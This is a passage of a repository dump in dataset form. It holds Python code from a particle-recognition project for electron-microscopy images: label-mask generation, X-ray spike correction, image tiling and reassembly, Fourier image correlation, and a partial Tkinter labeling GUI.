= y - location[1]\n if np.sqrt((dx**2+dy**2)) <= radius \\\n and int(x) < label_mask.shape[0] and int(y) < label_mask.shape[1]:\n label_mask[int(y),int(x)] = 1\n return label_mask\n\ndef mask_maker(file):\n centers, radii, image_size = txt_reader(file)\n label_mask = np.zeros(image_size)\n for idx,radius in enumerate(radii):\n label_mask = spot_maker(centers[idx],radius,label_mask)\n return label_mask\n\ndef mask_pipeline(directory):\n file_list = glob(directory+'/text_files/*.txt')\n name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n for idx, file in enumerate(file_list):\n if len(open(file,'r').readlines()) == 0:\n pass\n else:\n label_mask = mask_maker(file)\n plt.imsave(directory+'/labels/'+name_list[idx]+'.png',label_mask, cmap='gray')\n shutil.move(file,directory+'/old_text_files/')\n print('done!')\n" }, { "alpha_fraction": 0.536238968372345, "alphanum_fraction": 0.5773751139640808, "avg_line_length": 39.039215087890625, "blob_id": "3a50ed3c92a87ff28a2da1c86a698a96f5bc189b", "content_id": "9558f8d7bb13779f1333c55502c935015c23d1a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "no_license", "max_line_length": 124, "num_lines": 51, "path": "/image_processing/timage_v1.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom glob import glob\nfrom ncempy.io import dm\nfrom matplotlib.image import imsave\nfrom matplotlib import cm\nfrom skimage import transform\n\ndef imm(image):\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(image, cmap = 'gray')\n ax.axis('off')\n\ndef xray_correct(image):\n if type(image) is not np.ndarray:\n raise TypeError('Input must be numpy ndarray.')\n image[image<0] = 0\n bad_loc = np.argwhere(image > ((image.mean()+1000)-image.std()))\n for loc in bad_loc:\n if loc[0]+1 > (image.shape[0]-1) or loc[0]-1 < 0 or loc[1]+1 > (image.shape[1]-1) or loc[1] - 1 < 0:\n new_pixel_int = image.mean()+(image.std()*5)\n else:\n neighbor_sum = image[loc[0]-1,loc[1]] + image[loc[0]+1,loc[1]] + image[loc[0],loc[1]-1] + image[loc[0],loc[1]+1]\n new_pixel_int = neighbor_sum /4\n image[loc[0],loc[1]] = new_pixel_int\n return image\n# def 
auto_adjust_TEM(image):\n#     image = exposure.equalize_adapthist(exposure.adjust_sigmoid(clean_xray(image)))\n#     return image\n\ndef adjust_pipeline(directory_list):\n    for directory in directory_list:\n        try:\n            os.mkdir(directory+'/adjustedPNG')\n            new_directory = directory+'/adjustedPNG'\n        except FileExistsError:\n            new_directory = directory+'/adjustedPNG'\n        dm3s = glob(directory+ '/*.dm3')\n        for dm3 in dm3s:\n            img = dm.dmReader(dm3)['data']\n            if img.shape[0] < 1024:\n                pass\n            elif img.shape[0] == 2048 and img.shape[1] == 2048:\n                img = transform.resize(img,(1024,1024))\n                name = dm3.split('/')[-1].split('.')[0]\n                imsave(new_directory+'/'+name+'.png', xray_correct(img), format=\"png\", cmap=cm.gray)\n            elif img.shape[0] == 1024 and img.shape[1] == 1024:\n                name = dm3.split('/')[-1].split('.')[0]\n                imsave(new_directory+'/'+name+'.png', xray_correct(img), format=\"png\", cmap=cm.gray)\n    print('done!')\n" }, { "alpha_fraction": 0.358705997467041, "alphanum_fraction": 0.358705997467041, "avg_line_length": 60.82352828979492, "blob_id": "36d11a0001d2b9510cdd1010073437b20c44cda2", "content_id": "b4f91044eda7c4b87b2e0fb854536c5b143b27d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1051, "license_type": "no_license", "max_line_length": 318, "num_lines": 17, "path": "/image_processing/ncempy/io/README.rst", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "ncempy.io\n==========\n\nThe ``ncempy.io`` module contains the file IO necessary for the various data formats floating around in electron microscopy. Internally the package is designed to work with the versatile EMD file format; other formats are interfaced with importers. The interfaces of each file format are implemented in their own classes.\n\nContents\n--------\n\nOverview of contents with short description:\n\n+--------------------+--------------------------------------------------------------------+\n| Module             | Description                                                        |\n+====================+====================================================================+\n| emd                | EMD file format.                                                   |\n+--------------------+--------------------------------------------------------------------+\n| ser                | SER file format used by TIA (FEI).                                 |\n+--------------------+--------------------------------------------------------------------+\n
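\nExample\n-------\n\nA minimal usage sketch, assuming a DM3 file on disk; the file path below is hypothetical, and the call mirrors how scripts elsewhere in this repository use ``ncempy.io.dm``::\n\n    from ncempy.io import dm\n\n    # read the image array stored in a DM3 file\n    img = dm.dmReader('/path/to/image.dm3')['data']\n    print(img.shape)\n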
" }, { "alpha_fraction": 0.5556100606918335, "alphanum_fraction": 0.5823421478271484, "avg_line_length": 49.03067398071289, "blob_id": "27af7a89a753645f5a85012b40eaca780d7ccc7a", "content_id": "d6bae2ebe1e5feb3435f67be4acc6612492c3215", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8155, "license_type": "no_license", "max_line_length": 113, "num_lines": 163, "path": "/classfier_builds/helperfuncs.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom skimage import io\n\ndef imm(image):\n    \"\"\"function to display a large grayscale image\"\"\"\n    fig, ax = plt.subplots(figsize=(10,10))\n    ax.imshow(image, cmap = 'gray')\n    ax.axis('off')\n\ndef check_label(labels,images,idx,alpha = 0.25):\n    \"\"\"Takes in skimage ImageCollections for labels and original images and an index for an image\n    to show the overlay of the created label mask and original image\"\"\"\n    pic = alpha*np.reshape(labels[idx][:,:,0],(1024,1024)) + (1-alpha)*np.reshape(images[idx][:,:,0],(1024,1024))\n    imm(pic)\n\ndef image_slice(directory, im_lbl):\n    \"\"\"used to break up the 1024x1024 images into 512x512 segments; takes a\n    directory and a string specifying whether it is slicing 'image' or 'label'\"\"\"\n    if im_lbl == 'image':\n        file_list = glob(directory+'/images/*.png')\n        new_directory = directory + '/sliced_images/'\n    elif im_lbl == 'label':\n        file_list = glob(directory+'/labels/*.png')\n        new_directory = directory + '/sliced_labels/'\n    name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n    for idx, file in enumerate(file_list):\n        image2split = plt.imread(file)\n        image1 = image2split[:512,:512,:]\n        plt.imsave(new_directory+name_list[idx]+'_a.png',image1, cmap='gray')\n        image1 = image2split[512:,:512,:]\n        plt.imsave(new_directory+name_list[idx]+'_b.png',image1, cmap='gray')\n        image1 = image2split[:512,512:,:]\n        plt.imsave(new_directory+name_list[idx]+'_c.png',image1, cmap='gray')\n        image1 = image2split[512:,512:,:]\n        plt.imsave(new_directory+name_list[idx]+'_d.png',image1, cmap='gray')\n    print('done!')\n\ndef image_slice_small(directory):\n    \"\"\"Used to break up the 1024x1024 images into 64x64 segments; takes a\n    directory that is the source. This is only for creating a training dataset.
\n    Throws out regions of the masks and images with no identified\n    particles so that the training set will have a better balance of positive and\n    negative pixels.\"\"\"\n    image_file_list = glob(directory+'/images/*.png')\n    image_new_directory = directory + '/small_sliced_images/'\n    if os.path.isdir(image_new_directory) != True:\n        os.mkdir(image_new_directory)\n    label_file_list = glob(directory+'/labels/*.png')\n    label_new_directory = directory + '/small_sliced_labels/'\n    if os.path.isdir(label_new_directory) != True:\n        os.mkdir(label_new_directory)\n    image_name_list = [name.split('/')[-1].split('.')[0] for name in image_file_list]\n    label_name_list = [name.split('/')[-1].split('.')[0] for name in label_file_list]\n    if len(image_name_list) != len(label_name_list):\n        raise RuntimeError('different number of images and labels')\n    if image_name_list != label_name_list:\n        raise RuntimeError('images and labels did not match')\n    for idx, file in enumerate(image_file_list):\n        image2split = io.imread(file, as_grey=True)\n        label2split = io.imread(label_file_list[idx], as_grey=True)\n        for x in range(0,15*64,64):\n            for y in range(0,15*64,64):\n                image = image2split[x:x+64,y:y+64]\n                label = label2split[x:x+64,y:y+64]\n                if np.any(np.isin([1],label)) == False:\n                    pass\n                else:\n                    image_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n                    label_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n                    plt.imsave(image_new_directory+image_name,image, cmap='gray')\n                    plt.imsave(label_new_directory+label_name,label, cmap='gray')\n    print('done!')\n\ndef slicing_for_assembley(directory):\n    \"\"\"Used to break up the 1024x1024 images into 64x64 segments; takes a\n    directory that is the source. Same process as image_slice_small but all\n    regions are saved so that they can be stitched back together\"\"\"\n    image_file_list = glob(directory+'/images/*.png')\n    image_new_directory = directory + '/small_sliced_images_asmbl/'\n    if os.path.isdir(image_new_directory) != True:\n        os.mkdir(image_new_directory)\n    label_file_list = glob(directory+'/labels/*.png')\n    label_new_directory = directory + '/small_sliced_labels_asmbl/'\n    if os.path.isdir(label_new_directory) != True:\n        os.mkdir(label_new_directory)\n    image_name_list = [name.split('/')[-1].split('.')[0] for name in image_file_list]\n    label_name_list = [name.split('/')[-1].split('.')[0] for name in label_file_list]\n    if len(image_name_list) != len(label_name_list):\n        raise RuntimeError('different number of images and labels')\n    if image_name_list != label_name_list:\n        raise RuntimeError('images and labels did not match')\n    for idx, file in enumerate(image_file_list):\n        image2split = io.imread(file, as_grey=True)\n        label2split = io.imread(label_file_list[idx], as_grey=True)\n        for x in range(0,16*64,64):\n            for y in range(0,16*64,64):\n                image = image2split[x:x+64,y:y+64]\n                label = label2split[x:x+64,y:y+64]\n                image_name = image_name_list[idx]+ '-' + str(x)+ '-' + str(y) + '.png'\n                if x != 64 and y != 64:\n                    label_name = image_name_list[idx]+ '-' + str(x)+ '-' + str(y) + '.png'\n                elif x != 64 and y == 64:\n                    label_name = image_name_list[idx]+ '-' + str(x)+ '-' + str(0) +str(y) + '.png'\n                elif x == 64 and y != 64:\n                    label_name = image_name_list[idx]+ '-' +str(0)+str(x)+ '-' +str(y) + '.png'\n                elif x == 64 and y == 64:\n                    label_name = image_name_list[idx]+ '-' + str(0)+ str(x)+ '-' + str(0) +str(y) + '.png'\n                plt.imsave(image_new_directory+image_name,image, cmap='gray')\n                plt.imsave(label_new_directory+label_name,label, cmap='gray')\n    print('done!')\n
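\n# A minimal usage sketch tying the slicing helpers above together (the path\n# is hypothetical; each helper expects the images/ and labels/ subfolders\n# described in its docstring):\n#\n#     image_slice_small('/data/run1')       # 64x64 training tiles, empty tiles skipped\n#     slicing_for_assembley('/data/run1')   # 64x64 tiles with nothing skipped\n#     reassemble_slices('/data/run1')       # stitch tiles back into full-size masks\n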
\ndef reassemble_slices(directory):\n    \"\"\"Stitches 64x64 label tiles back into full-size masks and saves them to\n    reconstructed_images/ (tiles are read from small_sliced_labels/).\"\"\"\n    label_file_list = glob(directory+'/small_sliced_labels/*.png')\n    label_file_list.append('end')\n    previous_label = label_file_list[0].split('/')[-1].split('-')[0]\n    previous_x = 'start'\n#     previous_y = label_file_list[0].split('/')[-1].split('-')[2].split('.')[0]\n    img_row = np.zeros((64,64))\n    image = np.zeros((64,64))\n    label_dict = {}\n    for label in label_file_list:\n        original_label = label.split('/')[-1].split('-')[0]\n        if label != 'end':\n            sub_img = io.imread(label, as_grey=True)\n            sub_x = label.split('/')[-1].split('-')[1]\n            sub_y = label.split('/')[-1].split('-')[2].split('.')[0]\n        if original_label == previous_label:\n            if previous_x == 'start':\n                img_row = sub_img\n                previous_x = sub_x\n            elif sub_x == str(0) and previous_x == sub_x:\n                img_row = np.concatenate((img_row,sub_img),axis =1)\n                previous_x = sub_x\n            elif previous_x != sub_x and previous_x == str(0):\n                image = img_row\n                img_row = sub_img\n                previous_x = sub_x\n            elif sub_x != str(0) and previous_x == sub_x:\n                img_row = np.concatenate((img_row,sub_img),axis =1)\n                previous_x = sub_x\n            elif previous_x != sub_x and previous_x != str(0) and previous_x != 'start':\n                image = np.concatenate((image,img_row),axis =0)\n                img_row = sub_img\n                previous_x = sub_x\n        else:\n            image = np.concatenate((image,img_row),axis =0)\n            label_dict[previous_label] = image\n            previous_label = original_label\n            image = np.zeros((64,64))\n            img_row = sub_img\n            previous_x = sub_x\n        previous_label = original_label\n    if os.path.isdir(directory+'/reconstructed_images') == False:\n        new_directory = directory+'/reconstructed_images'\n        os.mkdir(new_directory)\n    else:\n        new_directory = directory+'/reconstructed_images'\n    for key in label_dict:\n        plt.imsave(new_directory+'/'+key+'.png',label_dict[key],cmap = 'gray')\n    print('done!')\n" }, { "alpha_fraction": 0.5899433493614197, "alphanum_fraction": 0.6154391169548035, "avg_line_length": 32.619049072265625, "blob_id": "7c07a0a9ab5b9c22e08b706e231e06dd5ea29690", "content_id": "3f51c78ead91ee64ad0e78876481abda40e601e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 85, "num_lines": 42, "path": "/image_processing/timage_v0.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import skimage as sk\nfrom skimage import io\nfrom skimage import exposure\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\ndef imm(image):\n    fig, ax = plt.subplots(figsize=(10,10))\n    ax.imshow(image, cmap = 'gray')\n    ax.axis('off')\n\ndef clean_xray(img):\n    image = sk.img_as_float(img.copy())\n    if type(image) is not np.ndarray:\n        raise TypeError('Input must be numpy ndarray.')\n    else:\n        p1 = np.percentile(image, 0.0001)\n        p80, p99 = np.percentile(image, (80, 99.99))\n        print(\"mean:\",image.mean(),'p80: ',p80,'p99: ',p99)\n        image[image > p99] = p80\n        image[image<p1] = p1\n    return sk.img_as_ubyte(image)\n\n# def auto_adjust_TEM(image):\n#     image = exposure.equalize_adapthist(exposure.adjust_sigmoid(clean_xray(image)))\n#     return image\n\ndef adjust_pipeline(directory_list):\n    for directory in directory_list:\n        try:\n            os.mkdir(directory+'/adjustedTif')\n            new_directory = directory+'/adjustedTif'\n        except FileExistsError:\n            new_directory = directory+'/adjustedTif'\n        images = io.ImageCollection(directory+\"/*.tif\")\n        file_list = images.files\n        name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n        for idx, img in enumerate(images):\n            image = clean_xray(img)\n            
plt.imsave(new_directory+'/'+name_list[idx]+'.png',image, cmap='gray')\n print('done!')\n" }, { "alpha_fraction": 0.6430547833442688, "alphanum_fraction": 0.6655071377754211, "avg_line_length": 46.37453079223633, "blob_id": "92e6a3c85cf5351a02c7b2ff97ee9b06337c1b4a", "content_id": "75694463e23101f08fbfd5a3ee77dc5643d63570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12649, "license_type": "no_license", "max_line_length": 365, "num_lines": 267, "path": "/image_processing/ncempy/algo/multicorr.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "'''\nModule to correlate two images, functionally written.\n'''\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef multicorr(G1, G2, method = 'cross', upsampleFactor = 1):\n '''\n Align a template to an image, possibly with multiple alignment peaks.\n Inputs:\n G1 - Fourier transform of image we are aligning to. Image reference\n G2 - Fourier transform of image that is being aligned. Image being registered\n Optional Inputs:\n 'phase' or 'cross' or 'hybrid' - string that specifies correlation method used. (default = 'cross')\n upsampleFactor - scalar integer specifying 1/subpixel_precision of fit. (default = 1)\n\n Returns:\n xyShift - the shift between G1 and G2 in pixels\n\n Defaults -\n method = 'phase';\n peakSearchMode = false; By default, we return only global best shift value.\n upsampleFactor = 1;\n '''\n method, upsampleFactor = parse_input(G1, G2, method, upsampleFactor)\n imageCorr = initial_correlation_image(G1, G2, method, upsampleFactor)\n xyShift = upsampled_correlation(imageCorr, upsampleFactor)\n print(method)\n print('------------')\n return xyShift\n\ndef parse_input(G1, G2, method = 'cross', upsampleFactor = 1):\n '''This function parses the inputs to make sure they're correct. Will raise errors if G1 or G2 are not ndarrays.\n\n Inputs:\n G1 - Fourier transform of image we are aligning to. Image reference\n G2 - Fourier transform of image that is being aligned. Image being registered\n method - correlation method ('phase', 'cross', 'hybrid'). Default 'cross'\n upsampleFactor - scalar integer specifying 1/subpixel_precision of fit. 
Default = 1.\n\n Returns:\n method - string ('phase', 'cross', 'hybrid')\n upsampleFactor - scalar integer\n '''\n # Check to make sure both G1 and G2 are arrays\n if type(G1) is not np.ndarray:\n raise TypeError('G1 must be an ndarray')\n elif type(G2) is not np.ndarray:\n raise TypeError('G2 must be an ndarray')\n\n # Check to make sure method and upsample factor are the correct values\n if method not in ['phase', 'cross', 'hybrid']:\n print('Unknown method used, setting to cross')\n method = 'cross'\n\n if type(upsampleFactor) is not int and type(upsampleFactor) is not float:\n print('Upsample factor is not an integer or float, setting to 1')\n upsampleFactor = 1\n elif type(upsampleFactor) is not int:\n print('Upsample factor is not an integer, rounding down')\n upsampleFactor = int(upsampleFactor)\n if upsampleFactor < 1:\n print('Upsample factor is < 1, setting to 1')\n upsampleFactor = 1\n\n # Verify images are the same size.\n if G1.shape != G2.shape:\n raise TypeError('G1 and G2 are not the same size, G1 is {0} and G2 is {1}'.format(str(G1.shape), str(G2.shape)))\n\n return method, upsampleFactor\n\ndef initial_correlation_image(G1, G2, method = 'cross', upsampleFactor = 1):\n '''\n Generate correlation image at initial resolution using the method specified.\n\n Inputs:\n G1 - Fourier transform of image we are aligning to. Image reference\n G2 - Fourier transform of image that is being aligned. Image being registered\n method - correlation method ('phase', 'cross', 'hybrid'). Default 'cross'\n upsampleFactor - scalar integer specifying 1/subpixel_precision of fit. Default = 1.\n\n Returns:\n imageCorr - an ndarray correlation image that has not yet been inverse Fourier transformed.\n '''\n G12 = np.multiply(G2, np.conj(G1)) # is this the correct order that we want?\n if method == 'phase':\n imageCorr = np.exp(1j * np.angle(G12))\n elif method == 'cross':\n imageCorr = G12\n elif method == 'hybrid':\n imageCorr = np.multiply(np.sqrt(np.absolute(G12)), np.exp(1j * np.angle(G12)))\n else:\n raise TypeError('{} method is not allowed'.format(str(method)))\n\n return imageCorr\n\ndef upsampled_correlation(imageCorr, upsampleFactor):\n '''\n Upsamples the correlation image by a set integer factor upsampleFactor. If upsampleFactor == 2, then it is naively Fourier upsampled. If the upsampleFactoris higher than 2, then it uses dftUpsample, which is a more efficient way to Fourier upsample the image.\n\n Inputs:\n imageCorr - Fourier transformed correlation image returned by initial_correlation_image. 
Is an ndarray.\n upsampleFactor - scalar integer of how much upsampling should be performed.\n\n Returns:\n xyShift - two element list with shift in x and y of G2 with respect to G1.\n '''\n\n imageCorrIFT = np.real(np.fft.ifft2(imageCorr))\n xyShift = list(np.unravel_index(imageCorrIFT.argmax(), imageCorrIFT.shape, 'C'))\n # print(['xyShift pre mod '] + xyShift)\n if upsampleFactor == 1:\n imageSize = imageCorrIFT.shape\n xyShift[0] = ((xyShift[0] + imageSize[0]/2) % imageSize[0]) - imageSize[0]/2\n xyShift[1] = ((xyShift[1] + imageSize[1]/2) % imageSize[1]) - imageSize[1]/2\n # print(['xyShift post mod '] + xyShift)\n #G2shift = np.fft.fft2(np.roll(np.roll(np.fft.ifft2(G2), int(xyShift[0]), 0), int(xyShift[1]), 1))\n else:\n imageCorrLarge = upsampleFFT(imageCorr, 2)\n imageSizeLarge = imageCorrLarge.shape\n xySubShift2 = list(np.unravel_index(imageCorrLarge.argmax(), imageSizeLarge, 'C'))\n print(['xySubShift2 '] + xySubShift2)\n xySubShift2[0] = ((xySubShift2[0] + imageSizeLarge[0]/2) % imageSizeLarge[0]) - imageSizeLarge[0]/2\n xySubShift2[1] = ((xySubShift2[1] + imageSizeLarge[1]/2) % imageSizeLarge[1]) - imageSizeLarge[1]/2\n xyShift = [i/2 for i in xySubShift2] #signs have to flip, or mod wrong?\n # print(xySubShift2)\n print(['xyShiftln127'] + xyShift)\n\n if upsampleFactor > 2:\n # here is where we use DFT registration to make things much faster\n # we cut out and upsample a peak 1.5 by 1.5 px from our original correlation image.\n\n xyShift[0] = np.round(xyShift[0] * upsampleFactor) / upsampleFactor\n xyShift[1] = np.round(xyShift[1] * upsampleFactor) / upsampleFactor\n\n globalShift = np.fix(np.ceil(upsampleFactor * 1.5)/2)# this line might have an off by one error based. The associated matlab comment is \"this will be used to center the output array at dftshift + 1\"\n print('globalShift', globalShift, 'upsampleFactor', upsampleFactor, 'xyShift', xyShift)\n\n imageCorrUpsample = np.conj(dftUpsample(np.conj(imageCorr), upsampleFactor, globalShift - np.multiply(xyShift, upsampleFactor))) / (np.fix(imageSizeLarge[0]) * np.fix(imageSizeLarge[1]) * upsampleFactor ** 2)\n\n xySubShift = np.unravel_index(imageCorrUpsample.argmax(), imageCorrUpsample.shape, 'C')\n # xySubShift = np.add(list(xySubShift), [1, 1])\n print('xySubShift', xySubShift)\n\n # add a subpixel shift via parabolic fitting\n try:\n icc = np.real(imageCorrUpsample[xySubShift[0] - 1 : xySubShift[0] + 2, xySubShift[1] - 1 : xySubShift[1] + 2])\n dx = (icc[2,1] - icc[0,1]) / (4 * icc[1,1] - 2 * icc[2,1] - 2 * icc[0,1])\n dy = (icc[1,2] - icc[1,0]) / (4 * icc[1,1] - 2 * icc[1,2] - 2 * icc[1,0])\n except:\n dx, dy = 0, 0 # this is the case when the peak is near the edge and one of the above values does not exist\n print('dxdy', dx, dy)\n print('xyShift', xyShift)\n xySubShift = xySubShift - globalShift;\n print('xysubShift2', xySubShift)\n xyShift = xyShift + (xySubShift + np.array([dx, dy])) / upsampleFactor\n print('xyShift2', xyShift)\n\n return xyShift\n\ndef upsampleFFT(imageInit, upsampleFactor):\n '''\n This does a Fourier upsample of the imageInit. imageInit is the Fourier transform of the correlation image. upsampleFactor is self-descriptive. The function returns the real space correlation image that has been Fourier upsampled by 2. 
It is written generally such that upsampleFactor can be greater than 2, but that should never happend/it has not been tested.\n\n The way it works is that it embeds imageInit in a larger array of zeros, then does the inverse Fourier transform to return the Fourier upsampled image in real space.\n\n Inputs:\n imageInit - ndarray of the image to be Fourier upsampled. This should be in the Fourier domain.\n upsampleFactor - integer scalar, almost always 2.\n\n Returns:\n imageUpsampleReal - the inverse Fourier transform of imageInit upsampled by the upsampleFactor. Is an ndarray.\n '''\n imageSize = imageInit.shape\n imageUpsample = np.zeros(tuple((i*upsampleFactor for i in imageSize))) + 0j\n imageUpsample[:imageSize[0], :imageSize[1]] = imageInit\n # plt.figure(1)\n # plt.imshow(np.real(imageUpsample))\n # plt.show(block = True)\n imageUpsample = np.roll(np.roll(imageUpsample, -int(imageSize[0]/2), 0), -int(imageSize[1]/2),1)\n imageUpsampleReal = np.real(np.fft.ifft2(imageUpsample))\n # plt.figure(1)\n # plt.imshow(imageUpsampleReal)\n # plt.show(block = True)\n return imageUpsampleReal\n\ndef dftUpsample(imageCorr, upsampleFactor, xyShift):\n '''\n This performs a matrix multiply DFT around a small neighboring region of the inital correlation peak. By using the matrix multiply DFT to do the Fourier upsampling, the efficiency is wildly improved. This is adapted from the subfuction dftups found in the dftregistration function on the Matlab File Exchange.\n\n https://www.mathworks.com/matlabcentral/fileexchange/18401-efficient-subpixel-image-registration-by-cross-correlation\n\n The matrix multiplication DFT is from Manuel Guizar-Sicairos, Samuel T. Thurman, and James R. Fienup, \"Efficient subpixel image registration algorithms,\" Opt. Lett. 33, 156-158 (2008). http://www.sciencedirect.com/science/article/pii/S0045790612000778\n\n Inputs:\n imageCorr - correlation image between two images in Fourier space. ndarray.\n upsampleFactor - scalar integer of how much to upsample.\n xyShift - single pixel shift between images previously computed. Used to center the matrix multiplication on the correlation peak. Is a two element list.\n Returns:\n imageUpsample - upsampled image from region around correlation peak. Is a ndarray (and I think the conjugate of the upsampled peak. Has to do wtih order of operations?)\n '''\n imageSize = imageCorr.shape\n pixelRadius = 1.5\n numRow = np.ceil(pixelRadius * upsampleFactor)\n numCol = numRow\n\n colKern = np.exp(\n (-1j * 2 * np.pi / (imageSize[1] * upsampleFactor))\n * (np.fft.ifftshift( (np.arange(imageSize[1])) )\n - np.floor(imageSize[1]/2))\n * (np.arange(numCol) - xyShift[1])[:, np.newaxis]\n ) # I think this can be written differently without the need for np.newaxis. This might require np.outer to compute the matrix itself instead of just using np.dot.\n\n rowKern = np.exp(\n (-1j * 2 * np.pi / (imageSize[0] * upsampleFactor))\n * (np.arange(numRow) - xyShift[0])\n * (np.fft.ifftshift(np.arange(imageSize[0]))\n - np.floor(imageSize[0]/2))[:, np.newaxis]\n ) # Comment from above applies.\n\n imageUpsample = np.real(np.dot(np.dot(rowKern.transpose(), imageCorr), colKern.transpose()))\n\n return imageUpsample\n\ndef imageShifter(G2, xyShift):\n '''\n This function multiplies G2 by a plane wave that has the real space effect of shifting ifft2(G2) by [x, y] pixels.\n\n Inputs:\n G2 - the Fourier transform of an image. ndarray.\n xyShift - a two element list\n\n Returns:\n G2shift - Fourier shifted G2. 
ndarray.\n '''\n imageSize = G2.shape\n qx = makeFourierCoords(imageSize[0], 1) # does this need to be a column vector\n if imageSize[1] == imageSize[0]:\n qy = qx\n else:\n qy = makeFourierCoords(imageSize[1], 1)\n\n G2shift = np.multiply(G2, np.outer( np.exp(-2j * np.pi * qx * xyShift[0]), np.exp(-2j * np.pi * qy * xyShift[1])))\n\n return G2shift\n\ndef makeFourierCoords(N, pSize):\n '''\n This function creates Fourier coordinates such that (0,0) is in the center of the array.\n\n Inputs:\n N - the maximum coordinate in the original frame.\n pSize - the pixel size\n\n Returns:\n q - a single row array that has transformed 0:N to -N/2:N/2, such that the array sizes are the same.\n '''\n\n N = float(N)\n if N % 2 == 0:\n q = np.roll(np.arange(-N/2, N/2, dtype = 'float64') / (N * pSize), int(-N/2), axis=0)\n else:\n q = np.roll(np.arange((1-N)/2, (N+1)/2) / (N * pSize), int((1-N)/2), axis=0)\n return q\n" }, { "alpha_fraction": 0.6830986142158508, "alphanum_fraction": 0.7112675905227661, "avg_line_length": 46.33333206176758, "blob_id": "2ecf1d19e05fe0781eaebd37012f7ecbcbe4a314", "content_id": "0014d36f09c66fd0067fbd6fe376d8510d27ef27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 54, "num_lines": 3, "path": "/classfier_builds/tests_rough_draft.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "def test_label_reader(txt_file,image_file_1024):\n labels, images = label_reader(txt_file,image_file)\n assert len(labels) == len(images)\n" }, { "alpha_fraction": 0.6227520108222961, "alphanum_fraction": 0.6394813656806946, "avg_line_length": 36.757896423339844, "blob_id": "20d73d4c250ae64c4de069a3ab99817d9addb898", "content_id": "bf16e90e7f80b9bc311b42b92feeb7ac84a38aad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7173, "license_type": "no_license", "max_line_length": 163, "num_lines": 190, "path": "/label_data_gui/test_gui_scroll.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\nimport glob\nimport os\nimport numpy as np\n\ndef init(data):\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.newCircleCenter = [0,0]\n data.imageSize = []\n\ndef getFiles(root):\n directory = filedialog.askdirectory() \n root.update() \n name = \".\"\n path = directory + \"/*.png\"\n print(path) \n files = []\n for fname in glob.glob(path):\n files.append(fname)\n \n return(files, path)\n\ndef imageOpen(files,data):\n image = Image.open(files[data.fileCounter])\n data.imageSize.append(image.size)\n #image = image.resize((512,512), Image.BICUBIC) #DONT CHANGE THIS UNLESS YOU CHANGE DEPENDECE OF OUTPUT\n photo = ImageTk.PhotoImage(image)\n return(photo)\n \ndef saveLabel(files,data):\n split = files[data.fileCounter].split(\".\")\n fname = split[0] + \".txt\"\n label_file = open(fname, \"w\")\n label_file.write(\"Particle Location:\\n\")\n for loc in data.recordCircleCenters:\n label_file.write(str(loc)+\"\\n\")\n label_file.write(\"\\n\"+\"Radius Size:\"+\"\\n\")\n for r in data.radii:\n #real_r = np.multiply(r,2) #because r is with respect to the 512x512 image not 1024x1024\n label_file.write(str(r)+\"\\n\")\n label_file.write(\"\\n\"+\"Defect Label:\"+\"\\n\")\n for label in data.labels:\n label_file.write(label+\"\\n\")\n 
label_file.write(\"\\n\"+\"Image Size:\"+\"\\n\")\n for size in data.imageSize: #so you can check that the original image was 1024x1024\n label_file.write(str(size)+\"\\n\")\n label_file.close()\n\ndef mousePressed(event, data,canvas, scrollbar):\n y_offset = scrollbar.get()[0]*1024\n data.newCircleCenter = [canvas.canvasx(event.x),canvas.canvasy(event.y)+y_offset]\n recordCircleCenter = [canvas.canvasx(event.x),canvas.canvasy(event.y)+y_offset] \n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters.append(recordCircleCenter)\n data.radii.append(data.radius)\n data.labels.append('null') #this marks particle as found but not atomic rez\n\ndef keyPressed(event, data,files,root):\n if (event.keysym == \"BackSpace\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop()\n data.recordCircleCenters.pop()\n data.radii.pop()\n data.labels.pop()\n else:\n print(\"No more circles to delete!\")\n if event.char == \"e\": #enlarge circle\n data.radius += 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.char == \"d\": #decrease circle\n data.radius -= 1\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Up\": #move circle up\n data.newCircleCenter[1] -= 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] -= 1\n if event.keysym == \"Down\": #move circle down\n data.newCircleCenter[1] += 1\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] += 1\n if event.keysym == \"Left\": #move circle left\n data.newCircleCenter[0] -= 1\n data.circleCenters.pop()\n 